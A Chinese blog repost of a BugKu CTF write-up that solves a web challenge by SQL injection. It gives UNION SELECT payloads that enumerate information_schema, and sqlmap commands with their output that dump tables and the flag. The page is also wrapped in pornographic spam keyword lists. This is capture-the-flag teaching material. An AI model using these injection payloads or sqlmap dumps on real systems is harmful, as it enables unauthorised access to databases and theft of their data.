日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

BugKuCTF WEB 成绩单

發布時間:2024/10/5 编程问答 49 豆豆
生活随笔 收集整理的這篇文章主要介紹了 BugKuCTF WEB 成绩单 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

http://123.206.87.240:8002/chengjidan/

?

題解:

版本一

輸入0' union select database(),2,3,4 #

數據庫名:skctf_flag

輸入0' union select table_name,2,3,4 from information_schema.tables where table_schema='skctf_flag'#?

數據庫表名:fl4g??

輸入0' union select column_name,2,3,4 from information_schema.columns where table_name='fl4g'#

數據庫列名:skctf_flag

輸入0' union select skctf_flag,2,3,4 from fl4g#

flag:BUGKU{Sql_INJECT0N_4813drd8hz4}?

版本二

工具:sqlmap

sqlmap檢測sql注入

python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1"

?結果

POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 89 HTTP(s) requests: --- Parameter: id (POST)Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1' AND SLEEP(5) AND 'fELh'='fELhType: UNION queryTitle: Generic UNION query (NULL) - 4 columnsPayload: id=-7971' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a6a71,0x4156665a546b554a6a64424c6354514d526f575257527a65414d586d516d6a765548776476594570,0x716b707671),NULL-- ErNP --- [11:01:58] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12

數據庫:mysql

?

?列舉數據庫

python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" --dbs

結果

available databases [2]: [*] information_schema [*] skctf_flag

數據庫:skctf_flag

?

列舉數據庫skctf_flag的表?

python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" -D skctf_flag --dump

結果

Database: skctf_flag [2 tables] +------+ | fl4g | | sc | +------+

skctf_flag的數據表:

fl4g

sc

?

?列舉內容

python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" -D skctf_flag --dump

結果?

Database: skctf_flag Table: sc [3 entries] +----+------+------+---------+---------+ | id | name | math | chinese | english | +----+------+------+---------+---------+ | 1 | 龍龍龍 | 60 | 70 | 60 | | 2 | 浩兒 | 70 | 74 | 84 | | 3 | 靜靜 | 80 | 90 | 85 | +----+------+------+---------+---------+[11:13:09] [INFO] table 'skctf_flag.sc' dumped to CSV file 'C:\Users\Administrator\.sqlmap\output\120.24.86.145\dump\skctf_flag\sc.csv' [11:13:09] [INFO] fetching columns for table 'fl4g' in database 'skctf_flag' [11:13:09] [INFO] used SQL query returns 1 entries [11:13:09] [INFO] fetching entries for table 'fl4g' in database 'skctf_flag' [11:13:09] [INFO] used SQL query returns 1 entries [11:13:09] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' [11:13:09] [INFO] fetching number of entries for table 'fl4g' in database 'skctf_flag' [11:13:09] [WARNING] time-based comparison requires larger statistical model, please wait................ (done) [11:13:11] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y 1 [11:17:50] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done) [11:18:03] [INFO] adjusting time delay to 2 seconds due to good response times BUGKU[11:18:42] [ERROR] invalid character detected. retrying.. [11:18:42] [WARNING] increasing time delay to 3 seconds {Sq[11:20:01] [ERROR] invalid character detected. retrying.. [11:20:01] [WARNING] increasing time delay to 4 seconds l_INJE[11:21:48] [ERROR] invalid character detected. retrying.. [11:21:48] [WARNING] increasing time delay to 5 seconds CT0N_4[11:24:01] [ERROR] invalid character detected. retrying.. [11:24:01] [WARNING] increasing time delay to 6 seconds 81[11:24:54] [ERROR] invalid character detected. retrying.. [11:24:54] [WARNING] increasing time delay to 7 seconds 3dr[11:26:24] [ERROR] invalid character detected. retrying.. [11:26:24] [WARNING] increasing time delay to 8 seconds d[11:27:10] [ERROR] invalid character detected. retrying.. [11:27:10] [WARNING] increasing time delay to 9 seconds 8hz4} Database: skctf_flag Table: fl4g [1 entry] +---------------------------------+ | skctf_flag | +---------------------------------+ | BUGKU{Sql_INJECT0N_4813drd8hz4} | +---------------------------------+

flag:BUGKU{Sql_INJECT0N_4813drd8hz4}?

總結

以上是生活随笔為你收集整理的BugKuCTF WEB 成绩单的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 色播综合网 | а√天堂中文在线资源8 | 成人免费视频国产 | av资源在线看 | www.亚洲成人 | 精品久久精品久久 | 91丨porny丨海角社区 | 日韩成人高清视频在线观看 | 爽爽影院在线免费观看 | 在线无码va中文字幕无码 | 成人精品视频在线播放 | 超碰在线色 | 熟女少妇一区二区三区 | 日本亚洲最大的色成网站www | 乱色精品无码一区二区国产盗 | 久久久久久无码精品大片 | 久久久久久久亚洲av无码 | 亚洲激情黄色 | 女人特黄大aaaaaa大片 | 国产三级午夜理伦三级 | 亚洲欧美在线免费观看 | 欧美色国 | 日本精品在线看 | 亚洲精品字幕 | 亚洲精品在线免费观看视频 | 不良视频在线观看 | 欲求不满在线小早川怜子 | 91在线短视频 | 黄网在线观看视频 | jizz俄罗斯 | 欧美无人区码suv | 麻豆精品视频在线 | www.色视频 | 国产图片一区 | 日韩成人在线播放 | 亚洲永久在线观看 | xxxx黄色 | 热九九精品| 啪啪影音 | 国产综合亚洲精品一区二 | 一区二区三区国产av | 正在播放久久 | 名校风暴在线观看免费高清完整 | 女同调教视频 | av在线免费播放网址 | 91精品国产日韩91久久久久久 | 97色吧 | 污视频在线免费观看 | 亚洲中文字幕无码一区 | 人妻少妇一区二区三区 | 欧美综合视频 | 国产情侣激情 | 2024国产精品视频 | 国产精品不卡 | 亚洲第一黄色网 | 香蕉视频97| 牛牛澡牛牛爽一区二区 | 伊人久久综合视频 | 在线观看视频一区 | 男女激情实录 | 日本一级三级三级三级 | 欧美精品在线看 | 在线看的免费网站 | 91精品国产91久久久久青草 | 久久桃色| 日本成人精品 | 日本变态折磨凌虐bdsm在线 | 狠狠爱天天干 | 国产黄色录像片 | 欧美视频色 | 草女人视频 | 又黄又爽视频在线观看 | 日日碰狠狠躁久久躁蜜桃 | 精品久久久久久久久久久国产字幕 | 欧美mv日韩mv国产网站 | 亚洲激情视频一区 | 东方伊甸园av在线 | 欧美精品久久久久久久久久 | 无码精品人妻一区二区 | 精品一区李梓熙捆绑 | 97在线免费 | 免费一区二区在线观看 | 越南性xxxx精品hd | 海角社区在线视频播放观看 | 中文字幕乱码人妻无码久久95 | 黄a在线观看 | 可以免费看的av毛片 | 在线国产网站 | 黄色片怎么看 | av不卡一区二区 | 国产精品资源在线观看 | 韩国黄色精品 | 欧美人狂配大交3d | 日韩专区一区二区三区 | 免费观看全黄做爰的视频 | 成人3d动漫一区二区三区 | 成年人免费看的视频 | 99久久人妻精品免费二区 | 国产传媒av在线 |